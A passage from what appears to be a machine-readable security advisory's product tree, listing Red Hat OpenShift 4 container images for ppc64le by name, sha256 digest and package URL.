"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"product_id": "registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/frr-rhel9@sha256%3A1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602311"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-cloud-controller-manager-rhel9@sha256%3Aaa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557397"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-cluster-api-controllers-rhel9@sha256%3Afadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775562941"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-pd-csi-driver-rhel9@sha256%3A7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602042"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-pd-csi-driver-operator-rhel9@sha256%3Ab8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557339"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibmcloud-cluster-api-controllers-rhel9@sha256%3A5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572733"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-insights-rhel9-operator@sha256%3A0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573055"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"product_id": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/insights-runtime-exporter-rhel9@sha256%3A65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605722"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"product_id": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/insights-runtime-extractor-rhel9@sha256%3Aee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565133"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-rhel9@sha256%3A21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775612266"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-artifacts-rhel9@sha256%3A9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775612304"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"product_id": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kube-metrics-server-rhel9@sha256%3Af3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605620"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-storage-version-migrator-rhel9@sha256%3A6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604115"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kubevirt-cloud-controller-manager-rhel9@sha256%3A6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565007"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"product_id": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kubevirt-csi-driver-rhel9@sha256%3Abe919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604912"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-libvirt-machine-controllers-rhel9@sha256%3Ab9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604362"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-rhel9-operator@sha256%3A448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-gcp-rhel9@sha256%3A59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602000"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-openstack-rhel9@sha256%3A486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564642"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-config-rhel9-operator@sha256%3Afaf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604341"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-os-images-rhel9@sha256%3Aa10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775619097"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-admission-controller-rhel9@sha256%3A47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604704"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-route-override-cni-rhel9@sha256%3Ad2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605900"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-whereabouts-ipam-cni-rhel9@sha256%3A6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605545"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-must-gather-rhel9@sha256%3A2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564698"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-network-interface-bond-cni-rhel9@sha256%3Ad6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-network-metrics-daemon-rhel9@sha256%3A8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605534"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"product_id": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/network-tools-rhel9@sha256%3A83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607479"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-apiserver-rhel9@sha256%3A0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605934"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-olm-catalogd-rhel9@sha256%3Ad735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604244"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-olm-operator-controller-rhel9@sha256%3A66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604309"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-apiserver-rhel9@sha256%3A46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572127"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-controller-manager-rhel9@sha256%3A5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564516"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9@sha256%3A3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606187"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"product_identification_helper": {
